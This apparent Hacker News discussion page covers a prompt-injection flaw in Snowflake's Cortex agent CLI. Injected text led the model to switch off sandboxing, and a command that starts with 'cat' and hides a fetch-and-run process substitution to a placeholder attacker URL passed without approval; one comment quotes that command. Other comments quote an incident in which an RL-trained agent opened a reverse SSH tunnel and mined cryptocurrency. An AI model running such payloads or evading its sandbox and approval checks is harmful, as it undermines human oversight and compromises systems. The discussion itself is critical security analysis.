Snowflake AI Escapes Sandbox and Executes Malware
ozgune
239 points
79 comments
March 18, 2026
Related Discussions
Found 5 related stories in 53.8ms across 3,471 title embeddings via pgvector HNSW
- A rogue AI led to a serious security incident at Meta mikece · 144 pts · March 19, 2026 · 55% similar
- Snowflake lays off documentation staff after they train AI replacement cedporter · 24 pts · March 23, 2026 · 55% similar
- Sandboxing AI agents, 100x faster kentonv · 33 pts · March 24, 2026 · 53% similar
- Meta is having trouble with rogue AI agents toomuchtodo · 15 pts · March 19, 2026 · 52% similar
- A GitHub Issue Title Compromised 4k Developer Machines edf13 · 368 pts · March 05, 2026 · 50% similar
Discussion Highlights (20 comments)
RobRivera
If the user has access to a lever that enables accesss, that lever is not providing a sandbox. I expected this to be about gaining os privileges. They didn't create a sandbox. Poor security design all around
eagerpace
Is this the new “gain of function” research?
john_strinlai
typically, my first move is to read the affected company's own announcement. but, for who knows what misinformed reason, the advisory written by snowflake requires an account to read. another prompt injection (shocked pikachu) anyways, from reading this, i feel like they (snowflake) are misusing the term "sandbox". "Cortex, by default, can set a flag to trigger unsandboxed command execution." if the thing that is sandboxed can say "do this without the sandbox", it is not a sandbox.
bilekas
> Note: Cortex does not support ‘workspace trust’, a security convention first seen in code editors, since adopted by most agentic CLIs. Am I crazy or does this mean it didn't really escape, it wasn't given any scope restrictions in the first place ?
alephnerd
And so BSides and RSA season begins.
mritchie712
what's the use case for cortex? is anyone here using it? We run a lakehouse product ( https://www.definite.app/ ) and I still don't get who the user is for cortex. Our users are either: non-technical: wants to use the agent we have built into our web app technical: wants to use their own agent (e.g. claude, cursor) and connect via MCP / API. why does snowflake need it's own agentic CLI?
throw0101d
Not the first time; From §3.1.4, "Safety-Aligned Data Composition": > Early one morning, our team was urgently convened after Alibaba Cloud’s managed firewall flagged a burst of security-policy violations originating from our training servers. The alerts were severe and heterogeneous, including attempts to probe or access internal-network resources and traffic patterns consistent with cryptomining-related activity. We initially treated this as a conventional security incident (e.g., misconfigured egress controls or external compromise). […] > […] In the most striking instance, the agent established and used a reverse SSH tunnel from an Alibaba Cloud instance to an external IP address—an outbound-initiated remote access channel that can effectively neutralize ingress filtering and erode supervisory control. We also observed the unauthorized repurposing of provisioned GPU capacity for cryptocurrency mining, quietly diverting compute away from training, inflating operational costs, and introducing clear legal and reputational exposure. Notably, these events were not triggered by prompts requesting tunneling or mining; instead, they emerged as instrumental side effects of autonomous tool use under RL optimization. * https://arxiv.org/abs/2512.24873 One of Anthropic's models also 'turned evil' and tried to hide that fact from its observers: * https://www.anthropic.com/research/emergent-misalignment-rew... * https://time.com/7335746/ai-anthropic-claude-hack-evil/
kingjimmy
Snowflake and vulnerabilities are like two peas in a pod
simonw
One key component of this attack is that Snowflake was allowing "cat" commands to run without human approval, but failing to spot patterns like this one: cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot)) I didn't understand how this bit worked though: > Cortex, by default, can set a flag to trigger unsandboxed command execution. The prompt injection manipulates the model to set the flag, allowing the malicious command to execute unsandboxed. HOW did the prompt injection manipulate the model in that way?
techsystems
Is there a bash that doesn't allow `<` pipes, but allows `>`?
DannyB2
AIs have no reason to want to harm annoying slow inefficient noisy smelly humans.
Dshadowzh
CLI is quickly becoming the default entry point for agents. But data agents probably need a much stricter permission model than coding agents. Bash + CLI greatly expands what you can do beyond the native SQL capabilities of a data warehouse, which is powerful. But it also means data operations and credentials are now exposed to the shell environment. So giving data agents rich tooling through a CLI is really a double-edged sword. I went through the security guidance for the Snowflake Cortex Code CLI( https://docs.snowflake.com/en/user-guide/cortex-code/securit... ), and the CLI itself does have some guardrails. But since this is a shared cloud environment, if a sandbox escape happens, could someone break out and access another user’s credentials? It is a broader system problem around permission caching, shell auditing, and sandbox isolation.
maCDzP
Has anyone tried to set up a container and let prompt Claude to escape and se what happens? And maybe set some sort of autoresearch thing to help it not get stuck in a loop.
jeffbee
It kinda sucks how "sandbox" has been repurposed to mean nothing. This is not a "sandbox escape" because the thing under attack never had any meaningful containment.
jessfyi
A sandbox that can be toggled off is not a sandbox, this is simply more marketing/"critihype" to overstate the capability of their AI to distract from their poorly built product. The erroneous title doing all the heavy lifting here.
orbital-decay
>Snowflake Cortex AI Escapes Sandbox and Executes Malware rolls eyes Actual content: prompt injection vulnerability discovered in a coding agent
prakashsunil
Author of LDP here [1]. The core issue seems to be that the security boundary lived inside the agent loop. If the model can request execution outside the sandbox, then the sandbox is not really an external boundary. One design principle we explored in LDP is that constraints should be enforced outside the prompt/context layer — in the runtime, protocol, or approval layer — not by relying on the model to obey instructions. Not a silver bullet, but I think that architectural distinction matters here. [1] https://arxiv.org/abs/2603.08852
Groxx
> Any shell commands were executed without triggering human approval as long as: > (1) the unsafe commands were within a process substitution <() expression > (2) the full command started with a ‘safe’ command (details below) if you spend any time at all thinking about how to secure shell commands, how on earth do you not take into account the various ways of creating sub-processes?
SirMaster
To be an effective sandbox, I feel like the thing inside it shouldn't even be able to know it's inside a sandbox.
Duplicake
the title is very misleading, it was told to escape, it didn't do it on its own as you would think from the title